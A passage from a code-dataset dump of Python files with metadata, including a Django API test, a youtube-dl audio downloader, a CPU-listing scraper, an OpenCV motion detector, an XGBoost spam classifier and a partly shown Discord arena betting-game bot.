{"api_name": "tensorflow.random", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tensorflow.squeeze", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.random.categorical", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 147, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 151, "usage_type": "call"}, {"api_name": "telebot.TeleBot", "line_number": 180, "usage_type": "call"}, {"api_name": "telebot.types.ReplyKeyboardMarkup", "line_number": 183, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 183, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 187, "usage_type": "call"}, {"api_name": "telebot.types.InlineKeyboardMarkup", "line_number": 204, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 204, "usage_type": "name"}, {"api_name": "telebot.types.InlineKeyboardButton", "line_number": 205, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 205, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 205, "usage_type": "call"}, {"api_name": "telebot.types.InlineKeyboardButton", "line_number": 206, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 206, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 206, "usage_type": "call"}, {"api_name": "telebot.types.InlineKeyboardButton", "line_number": 210, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 210, "usage_type": "name"}, {"api_name": "telebot.types.InlineKeyboardMarkup", "line_number": 217, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 217, "usage_type": "name"}, {"api_name": "telebot.types.InlineKeyboardButton", "line_number": 218, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 218, "usage_type": "name"}, {"api_name": "telebot.types.InlineKeyboardButton", "line_number": 219, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 219, "usage_type": "name"}, {"api_name": "telebot.types.ReplyKeyboardMarkup", "line_number": 222, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 222, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 251, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 253, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 253, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 271, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 287, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 291, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 291, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 366, "usage_type": "call"}]}
+{"seq_id": "134170450", "text": "from rest_framework import status\n\nimport ozpcenter.model_access as generic_model_access\nfrom ozpcenter.scripts import sample_data_generator as data_gen\nfrom tests.ozp.cases import APITestCase\n\n\nclass RootViewApiTest(APITestCase):\n\n @classmethod\n def setUpTestData(cls):\n data_gen.run()\n\n def setUp(self):\n pass\n\n def test_hal_struct(self):\n user = generic_model_access.get_profile('wsmith').user\n self.client.force_authenticate(user=user)\n url = '/iwc-api/'\n response = self.client.get(url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue('_links' in response.data)\n self.assertTrue('_embedded' in response.data)\n\n self.assertTrue('ozp:application' in response.data['_links'])\n self.assertTrue('/self/application/' in response.data['_links']['ozp:application']['href'])\n\n self.assertTrue('ozp:system' in response.data['_links'])\n self.assertTrue('ozp:user' in response.data['_links'])\n self.assertTrue('ozp:intent' in response.data['_links'])\n self.assertTrue('ozp:user-data' in response.data['_links'])\n", "sub_path": "tests/ozpiwc/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1166, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tests.ozp.cases.APITestCase", "line_number": 8, "usage_type": "name"}, {"api_name": "ozpcenter.scripts.sample_data_generator.run", "line_number": 12, "usage_type": "call"}, {"api_name": "ozpcenter.scripts.sample_data_generator", "line_number": 12, "usage_type": "name"}, {"api_name": "ozpcenter.model_access.get_profile", "line_number": 18, "usage_type": "call"}, {"api_name": "ozpcenter.model_access", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 22, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "520373325", "text": "from __future__ import unicode_literals\nimport youtube_dl\n\n\nydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n}\n\nif __name__ == \"__main__\":\n link = input()\n print(\"Enter the link to the video, whose audio you want to download\")\n youtube_dl.YoutubeDL(ydl_opts).download(link)", "sub_path": "Python/Youtube/YoutubeMP3Download.py", "file_name": "YoutubeMP3Download.py", "file_ext": "py", "file_size_in_byte": 416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "youtube_dl.YoutubeDL", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "582549886", "text": "import sys\nimport random\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport requests\nimport os\n\ndef main():\n getpage()\n #print(\"hello\")\n\ndef getpage():\n\n r = requests.get('https://ksp.co.il/?select=.1027..2..42..4039.&kg=&list=1&sort=2&glist=1&uin=0&txt_search=&buy=&minprice=0&maxprice=0&intersect=&rintersect=&store_real=')\n #print(type(r.text))\n cardlist=printstuff(r.text)\n ##print(cardlist)\n fixed=fixlist(cardlist)\n #print(fixed)\n\n ##print(\"first list len\"+str(len(cardlist)))\n #print(\"secend list len\"+str(len(fixed)))\n #printlist(fixed)\n # print(\"\")\n # print(\"\")\n # print(\"\")\n #printlist(fixed)\n fixed=fixlistb(fixed)\n # print(\"\")\n # print(\"\")\n # print(\"\")\n #printlist(fixed)\n #print(\"can I buy the cpu I want (5600)in ksp:\"+str(upgeade(fixed)))\n #os.system('cls')\n #os.system('clear')\n #printlist(fixlistb(fixed))\n #print(r.text.decode('UTF-8'))\n return fixed \n\ndef upgeade(a):\n ret=False\n for i in a:\n if(i.find(\"5600\")!=-1):\n ret=True\n return ret\n\ndef printlist(a):\n for i in a:\n print(i)\n\ndef fixlistb(a):\n for i in range(len(a)):\n a[i]=a[i][5:]\n return a \n\ndef fixlist(a):\n b=[]\n b.append(a[0])\n add=True\n for i in range(len(a)):\n add=True\n for j in range(len(b)):\n if(b[j].find(a[i][:len(a[i])-7])!=-1):\n add=False\n \n if(add):\n b.append(a[i])\n return b\n \n\n\n\n \ndef printstuff(r):\n l=r.find(\"AMD\")\n ret=[]\n while(l!=-1):\n a=r[l:].find(\"<\")\n b=l\n while(r[b]!=\"<\"):\n b=b-1\n #print(r[l-b:l+a])\n gpu=r[l-30:l+a]\n if(gpu.find(\"Box\")!=-1):\n #print(r[l-20:l+a])\n #print(\"the > if in:\"+str(gpu.find(\">\")))\n while(gpu.find(\">\")!=-1):\n gpu=gpu[gpu.find(\">\")+1:]\n #print(gpu)\n ret.append(gpu)\n \n r=r[l+20:]\n l=r.find(\"AMD\")\n return ret\n\ndef openbrowser():\n print(\"\")\n #browser = webdriver.Chrome(ChromeDriverManager().install())\n #browser.get('https://ksp.co.il/index.php?select=.35.&kg=&list=1&sort=1&glist=1&uin=0&txt_search=rtx&buy=&minprice=0&maxprice=0&intersect=&rintersect=&store_real=')\n\n \n\nmain()", "sub_path": "botprosesors.py", "file_name": "botprosesors.py", "file_ext": "py", "file_size_in_byte": 2340, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "473530232", "text": "import cv2 as cv\nimport numpy as np\n\ncap = cv.VideoCapture(0);\nret, frame = cap.read();\navgframe = np.float32(frame);\n\n\nopening_kernel = np.ones((13,13),np.uint8);\n\ncv.namedWindow(\"End product\");\nwhile True:\n ret,frame = cap.read();\n # real time frame\n #cv.imshow(\"Ori frame\",frame);\n #the smaller the alpha, the slower the better\n cv.accumulateWeighted(frame,avgframe,0.25);\n resframe = cv.convertScaleAbs(avgframe);\n #calculate background from the real time frame\n #cv.imshow(\"Background frame\", resframe);\n\n #seperate background and foreground\n difframe = cv.absdiff(frame,resframe);\n #cv.imshow(\"Diff frame\",difframe);\n\n #convert the abs diff image into greyscale\n greydifframe = cv.cvtColor(difframe,cv.COLOR_BGR2GRAY);\n #cv.imshow(\"Gray diff frame\",greydifframe);\n \n #(ksizewidth,ksizeheight) needs to be odd number,\n #the bigger the value, the blurrer it is\n blurdiff = cv.GaussianBlur(greydifframe,(21,21),0);\n #cv.imshow(\"Blur diff frame\",blurdiff);\n _,thresdiff = cv.threshold(blurdiff,15,255,cv.THRESH_BINARY);\n dilateddiff = cv.dilate(thresdiff, None, iterations=20);\n openeddiff = cv.morphologyEx(thresdiff,cv.MORPH_OPEN,opening_kernel);\n _, contours, _ = cv.findContours(dilateddiff, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE);\n #contours, _ = cv.findContours(dilateddiff, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE);\n cv.imshow(\"After procs Diff\",dilateddiff);\n #cv.drawContours(frame, contours, -1, (0,255,0), 2);\n \n\n #end product\n #'''\n rect_cont = [];\n for c in contours:\n rect_cont.append(cv.contourArea(c));\n if (len(rect_cont) != 0 and len(rect_cont) >= 5):\n rect_cont.sort();\n mid_area = rect_cont[int(len(rect_cont)*2/3)];\n else:\n mid_area = 0;\n for c in contours:\n (x,y,w,h) = cv.boundingRect(c);\n if (cv.contourArea(c) >= mid_area):\n cv.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2);\n #'''\n cv.imshow(\"End product\",frame);\n \n key = cv.waitKey(1);\n if key==ord(\"q\"):\n break\n\ncv.destroyAllWindows();\ncap.release();\n", "sub_path": "MotionDetection2.py", "file_name": "MotionDetection2.py", "file_ext": "py", "file_size_in_byte": 2127, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "cv2.VideoCapture", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.accumulateWeighted", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.convertScaleAbs", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.absdiff", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.morphologyEx", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "14912791", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.path import Path\n\nclass StrokesPath(Path):\n # input should be a single drawing of size Ns * 3\n # remember to convert the 5 hot to 3 hot\n def __init__(self, data, scale=1, *args, **kwargs):\n vertices = np.asarray(data)\n vertices = np.cumsum(vertices[:, :-1], axis=0) * scale\n self.min_x = np.min(vertices[:, 0])\n self.max_x = np.max(vertices[:, 0])\n self.min_y = np.min(vertices[:, 1])\n self.max_y = np.max(vertices[:, 1])\n codes = np.append([1], data[:-1, -1])\n codes = self.to_code(codes.astype(int))\n super(StrokesPath, self).__init__(vertices.astype(int), codes, *args, **kwargs)\n \n @staticmethod\n def to_code(cmd):\n return Path.LINETO - cmd\n\n# change trained data into drawable data\n# data should be of size Nmax * 5\ndef to_drawable(data):\n ns = 0\n data = np.asarray(data)\n for i in range(data.shape[0]):\n if data[i, 2] == 0 and data[i, 3] == 0 and data[i, 4] == 1:\n ns = i\n break\n\n meaningful_data = data[:ns + 1, (0, 1, 3)]\n return meaningful_data\n", "sub_path": "tools/drawer.py", "file_name": "drawer.py", "file_ext": "py", "file_size_in_byte": 1075, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "matplotlib.path.Path", "line_number": 5, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.path.Path.LINETO", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.path.Path", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "31497832", "text": "from sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom xgboost import XGBClassifier\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import GridSearchCV\nfrom xgboost import plot_importance\nfrom matplotlib import pyplot as plt\ndef tokenizer_space(line):\n # 按空格分词\n return [li for li in line.split() if li.strip() != '']\n \n \n#训练样本的tf-idf的生成\ndef get_data_tf_idf(train_text):\n #tokenizer=tokenizer_space表示使用上面的tikenizer_space完成分词任务\n vectoring = TfidfVectorizer(input='content', tokenizer=tokenizer_space, analyzer='word')\n content = open(train_text, 'r', encoding='utf8').readlines()\n x = vectoring.fit_transform(content)\n return x, vectoring\n\n#测试样本的tf-idf的生成 \ndef get_test_data_tf_idf(train_text,test_text):\n vectoring = TfidfVectorizer(input='content', tokenizer=tokenizer_space, analyzer='word')\n content = open(train_text, 'r', encoding='utf8').readlines()\n content1 = open(test_text, 'r', encoding='utf8').readlines()\n x_train = vectoring.fit_transform(content)\n x_test = vectoring.transform(content1)\n return x_test, vectoring\n\n#获取样本的标签\ndef get_label_list(label_file_name):\n with open(label_file_name, 'r', encoding='utf8') as f:\n lebel_list=[]\n for line in f:\n lebel_list.append(line[0])\n return np.array(lebel_list)\ntrain_text = 'email.txt'\ntrain_labels = 'labels.txt'\n\n\nx, vectoring = get_data_tf_idf(train_text)\n\ny = get_label_list(train_labels)\n\n\n#样本打乱\nindex = np.arange(len(y)) \nnp.random.shuffle(index)\nx = x[index]\ny = y[index]\n\n#8:2划分训练集和测试集\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\n\n\nmodel=XGBClassifier() \n \nmodel.fit(x_train, y_train) \npred =model.predict(x_test)#预测测试集数据\nprint('classification_report\\n', metrics.classification_report(y_test, pred, digits=4))\nprint('Accuracy:', metrics.accuracy_score(y_test, pred))\n\ntest_text='sms_spam/sms_test.txt'\ntest_x, test_vectoring = get_test_data_tf_idf(train_text,test_text)\npred = model.predict(test_x)\nlines = []\n\nfor idx,value in enumerate(pred):\n line = '%s,%s\\n'%(idx+1,value)\n lines.append(line)\n\nwith open('key33.csv', 'w') as f:\n f.writelines(lines)\n#判断哪个特征对构建决策树最有价值 \nplot_importance(model)\nplt.show()\n", "sub_path": "xgboost/xgboost/xgboost_run.py", "file_name": "xgboost_run.py", "file_ext": "py", "file_size_in_byte": 2517, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 18, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 55, "usage_type": "call"}, {"api_name": "xgboost.XGBClassifier", "line_number": 58, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 62, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 63, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 63, "usage_type": "name"}, {"api_name": "xgboost.plot_importance", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}]}
+{"seq_id": "405166479", "text": "from discord.ext import commands\r\nfrom .economy import NoAccount\r\nfrom __main__ import send_cmd_help\r\nfrom .utils import checks\r\nfrom random import randint\r\nimport os\r\nimport time\r\nimport random\r\nimport asyncio\r\nimport discord\r\n\r\nclass Arena:\r\n \"\"\"Allows up to 1 players to play Arena Games\"\"\"\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n def enough_points(self, uid, amount):\r\n bank = self.bot.get_cog('Economy').bank\r\n if bank.can_spend(uid, amount):\r\n return True\r\n else:\r\n return False\r\n \r\n def account_check(self, speaker):\r\n bank = self.bot.get_cog('Economy').bank\r\n if bank.account_exists(speaker):\r\n return True\r\n else:\r\n return False\r\n \r\n def roleCheck(self, user : discord.User):\r\n Roles = user.roles\r\n for Role in Roles[:]:\r\n if Role.id == \"220712429636681728\": #Copper\r\n return 2\r\n elif Role.id == \"220712465866948610\": #Iron\r\n return 3\r\n elif Role.id == \"220712513484881921\": #Silver\r\n return 4\r\n elif Role.id == \"220712535861493760\": #Gold\r\n return 5\r\n elif str(Role.id) == \"220712555650351114\": #Platinum\r\n return 6\r\n elif Role.id == \"220712579587112960\": #Mythril\r\n return 7\r\n elif Role.id == \"220712606145576960\": #Orichalcum\r\n return 8\r\n elif Role.id == \"220712680728559616\": #Adamantite\r\n return 9\r\n elif Role.id == \"223488592486334465\": #Hero\r\n return 10\r\n elif Role.id == \"220756096086704129\": #God\r\n return 100\r\n else:\r\n pass\r\n return 1 #unranked\r\n \r\n def roleNameCheck(self, Number):\r\n if Number == 1:\r\n return \"Unranked\"\r\n elif Number == 2:\r\n return \"Copper\"\r\n elif Number == 3:\r\n return \"Iron\"\r\n elif Number == 4:\r\n return \"Silver\"\r\n elif Number == 5:\r\n return \"Gold\"\r\n elif Number == 6:\r\n return \"Platinum\"\r\n elif Number == 7:\r\n return \"Mythril\"\r\n elif Number == 8: \r\n return \"Orichalcum\"\r\n elif Number == 9:\r\n return \"Adamantite\"\r\n elif Number == 10:\r\n return \"Hero\"\r\n elif Number == 100:\r\n return \"God\"\r\n else:\r\n return \"Unranked\"\r\n \r\n def nationCheck(self, user : discord.User):\r\n Roles = user.roles\r\n for Role in Roles[:]:\r\n if Role.id == \"220742745420070923\": #TheKingdom\r\n return 2\r\n elif Role.id == \"220742070246047745\": #TheEmpire\r\n return 3\r\n elif Role.id == \"220741512818982913\": #TheTheocracy\r\n return 4\r\n else:\r\n pass\r\n return 1 #unranked\r\n \r\n def nationNameCheck(self, number):\r\n if number == 2: #TheKingdom\r\n return \"The Kingdom\"\r\n elif number == 3: #TheEmpire\r\n return \"The Empire\"\r\n elif number == 4: #TheTheocracy\r\n return \"The Theocracy\"\r\n else:\r\n return \"The Sorcerer Kingdom\"\r\n \r\n def randomStart(self, author):\r\n goodOutcome = {}\r\n goodOutcome['1'] = '{0} made the first move by dashing directly towards the opponent.'.format(author)\r\n goodOutcome['2'] = '{0} watched carefully and started approaching slowly.'.format(author)\r\n goodOutcome['3'] = '{0} tried to use random movement to throw off their opponent, heading towards them in a beeline.'.format(author)\r\n goodOutcome['4'] = '{0} growled in a fierce manner and charged.'.format(author)\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomStartResponse(self, author):\r\n goodOutcome = {}\r\n goodOutcome['1'] = '{0} held their weapon tight in preperation.'.format(author)\r\n goodOutcome['2'] = '{0} stepped backwards, anticipating the attack.'.format(author)\r\n goodOutcome['3'] = '{0} ran towards their opponent, trying to match their strategy.'.format(author)\r\n goodOutcome['4'] = '{0} started rocking side to side in an attempt to roll at the last moment.'.format(author)\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomPlace(self):\r\n goodOutcome = {}\r\n goodOutcome['1'] = 'high ground'\r\n goodOutcome['2'] = 'low ground'\r\n goodOutcome['3'] = 'side'\r\n goodOutcome['4'] = 'air'\r\n goodOutcome['5'] = 'ground'\r\n goodOutcome['6'] = 'wall'\r\n goodOutcome['7'] = 'dirt'\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomAttack(self):\r\n goodOutcome = {}\r\n goodOutcome['1'] = 'swing'\r\n goodOutcome['2'] = 'smash'\r\n goodOutcome['3'] = 'swipe'\r\n goodOutcome['4'] = 'poke'\r\n goodOutcome['5'] = 'stab'\r\n goodOutcome['6'] = 'slash'\r\n goodOutcome['7'] = 'jab'\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomDefend(self):\r\n goodOutcome = {}\r\n goodOutcome['1'] = 'block'\r\n goodOutcome['2'] = 'parry'\r\n goodOutcome['3'] = 'dodge'\r\n goodOutcome['4'] = 'counter'\r\n goodOutcome['5'] = 'deflect'\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomBody(self):\r\n goodOutcome = {}\r\n goodOutcome['1'] = 'head'\r\n goodOutcome['2'] = 'left arm'\r\n goodOutcome['3'] = 'right arm'\r\n goodOutcome['4'] = 'left leg'\r\n goodOutcome['5'] = 'right leg'\r\n goodOutcome['6'] = 'face'\r\n goodOutcome['7'] = 'body'\r\n goodOutcome['8'] = 'stomach'\r\n goodOutcome['9'] = 'torso'\r\n goodOutcome['10'] = 'back'\r\n goodOutcome['11'] = 'foot'\r\n goodOutcome['12'] = 'hand'\r\n goodOutcome['13'] = 'shoulder'\r\n goodOutcome['14'] = 'knee'\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def randomWeapon(self,):\r\n goodOutcome = {}\r\n goodOutcome['1'] = 'Sword'\r\n goodOutcome['2'] = 'Long Sword'\r\n goodOutcome['3'] = 'Knife'\r\n goodOutcome['4'] = 'Axe'\r\n goodOutcome['5'] = 'Hammer'\r\n goodOutcome['6'] = 'Scimitar'\r\n goodOutcome['7'] = 'Katana'\r\n goodOutcome['8'] = 'Great Sword'\r\n goodOutcome['9'] = 'Cleaver'\r\n goodOutcome['10'] = 'Brass Knuckles'\r\n good = random.choice([goodOutcome[i] for i in goodOutcome])\r\n return good\r\n \r\n def goodFight(self, authorOne, authorTwo, weaponOne, weaponTwo):\r\n place = self.randomPlace()\r\n attack = self.randomAttack()\r\n defend = self.randomDefend()\r\n body = self.randomBody()\r\n weapon = self.randomWeapon()\r\n outcome = {}\r\n outcome['1'] = authorOne + ' attacked with the ' + weaponOne + ' they carried. Trying to ' + attack + ' ' + authorTwo + ' and managing to score a hit on their ' + body + '.' \r\n outcome['2'] = 'The ' + weaponOne + ' and ' + weaponTwo + ' clashed as sparks illuminated the fighters faces. But ' + authorOne + ' used the ' + place + ' to their advantage and hit ' + authorTwo + '.' \r\n outcome['3'] = 'Picking up a random ' + weapon + ' off the ground, ' + authorOne + ' managed to hit ' + authorTwo + ' in the ' + body + '.' \r\n outcome['4'] = authorTwo + ' got knocked back into a wall and was forced to retreat as ' + authorOne + ' used the flat part of their ' + weaponOne + ' to harm ' + authorTwo + ' in the ' + body + '.' \r\n outcome['5'] = 'Using a great deal of force, ' + authorOne + ' managed to push ' + authorTwo + ' back and trip them up. Causing the ' + weaponTwo + ' they were carrying to injure them.'\r\n good = random.choice([outcome[i] for i in outcome])\r\n return good\r\n \r\n def midFight(self, authorOne, authorTwo, weaponOne, weaponTwo):\r\n place = self.randomPlace()\r\n attack = self.randomAttack()\r\n defend = self.randomDefend()\r\n body = self.randomBody()\r\n weapon = self.randomWeapon()\r\n outcome = {}\r\n outcome['1'] = authorOne + ' moved about carefully, considering if they could hurt ' + authorTwo + ' in the ' + body + '.' \r\n outcome['2'] = 'The ' + place + ' would be a good place to fight from. At least that\\'s what ' + authorOne + ' thought.'\r\n outcome['3'] = 'There was a ' + weapon + ' lying on the floor that ' + authorOne + ' thought of utilising.'\r\n outcome['4'] = authorOne + ' wondered if a ' + attack + ' hit ' + authorTwo + ' in the ' + body + ', whether it would do much damage or not.'\r\n outcome['5'] = 'A ' + defend + ' may be the best thing to do. ' + authorOne + ' prepared themselves in advance.'\r\n good = random.choice([outcome[i] for i in outcome])\r\n return good\r\n \r\n def badFight(self, authorOne, authorTwo, weaponOne, weaponTwo):\r\n place = self.randomPlace()\r\n attack = self.randomAttack()\r\n defend = self.randomDefend()\r\n body = self.randomBody()\r\n weapon = self.randomWeapon()\r\n outcome = {}\r\n outcome['1'] = 'Pushing their advantage too far, ' + authorOne + ' was shocked as the ' + weaponOne + ' they were using was easily stopped as ' + authorTwo + ' performed a ' + defend + ' and they were hurt instead.'\r\n outcome['2'] = 'Thinking that the ' + place + ' could have been used to hit ' + authorTwo + ', ' + authorOne + ' was suprised to find themselves hit in the ' + body + '.' \r\n outcome['3'] = authorOne + ' tripped and hurt their ' + body + ', giving ' + authorTwo + ' the advantage.' \r\n outcome['4'] = 'As ' + authorOne + ' and ' + authorTwo + ' clashed their weapons the ' + weaponTwo + ' that ' + authorTwo + ' was using hit ' + authorOne + ' in the ' + body + '.' \r\n outcome['5'] = authorOne + ' fell backwards and hit their ' + body + ' as ' + authorTwo + ' used their ' + weaponTwo + ' to do extra damage, despite the way ' + authorOne + ' tried to ' + defend + '.' \r\n out = random.choice([outcome[i] for i in outcome])\r\n return out\r\n \r\n @commands.cooldown(1, 300, commands.BucketType.user) \r\n @commands.command(pass_context=True, no_pm=True)\r\n async def pvp(self, ctx, bet: int):\r\n \"\"\"Arena PVP, requires 2 players\"\"\"\r\n author = ctx.message.author\r\n server = ctx.message.server\r\n chn = ctx.message.channel\r\n ready = False\r\n if self.account_check(author):\r\n if bet >= 50 and bet <= 3000:\r\n if self.enough_points(author, bet):\r\n pass\r\n else:\r\n await self.bot.say(\"You do not have enough gold.\")\r\n return\r\n else:\r\n await self.bot.say(\"You need to bet more than 50 and less than 3,000 Gold.\")\r\n return\r\n else:\r\n await self.bot.say(\"You cannot issue a challenge without an account first. Type '# bank register' to register with the Guild.\") \r\n return\r\n code = \"pvp \" + str(bet)\r\n await self.bot.say(author.name + \" has issued a challenge with a bet of \" + str(bet) + \" Gold!\" + \"\\n\" +\r\n \"To fight him enter '\" + code + \"' to accept the challenge!\")\r\n endtime = time.time() + 60\r\n while time.time() < endtime:\r\n msg = await self.bot.wait_for_message(timeout=60, channel=chn)\r\n if msg is not None:\r\n if msg.content == code:\r\n author2 = msg.author\r\n if author != author2:\r\n if self.account_check(author2):\r\n if self.enough_points(author2, bet):\r\n ready = True\r\n break\r\n else:\r\n await self.bot.say(\"You do not have enough gold.\")\r\n else:\r\n await self.bot.say(\"You cannot issue a challenge without an account first. Type '# bank register' to register with the Guild.\") \r\n else:\r\n await self.bot.say(\"You can't challenge yourself.\")\r\n else:\r\n pass\r\n else: \r\n pass\r\n if ready == True:\r\n pass\r\n else:\r\n await self.bot.say(\"Apparently no one wants to challenge you \" + author.mention + \"!\") \r\n return\r\n bank = self.bot.get_cog('Economy').bank\r\n bank.withdraw_gold(author, bet) \r\n bank.withdraw_gold(author2, bet) \r\n await self.bot.say(author.mention + \"! You have been challenged by \" + author2.mention + \" to a 1 on 1 battle!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"The location is an arena inside The Empire!\") \r\n Fighter1Role = self.roleCheck(author)\r\n Fighter1Nation = self.nationCheck(author)\r\n Fighter1RoleName = self.roleNameCheck(Fighter1Role)\r\n Fighter1NationName = self.nationNameCheck(Fighter1Nation)\r\n Fighter2Role = self.roleCheck(author2)\r\n Fighter2Nation = self.nationCheck(author2)\r\n Fighter2RoleName = self.roleNameCheck(Fighter2Role)\r\n Fighter2NationName = self.nationNameCheck(Fighter2Nation)\r\n Fighter1Weapon = self.randomWeapon()\r\n while True:\r\n Fighter2Weapon = self.randomWeapon()\r\n if Fighter2Weapon == Fighter1Weapon:\r\n Fighter2Weapon = self.randomWeapon()\r\n else:\r\n break\r\n 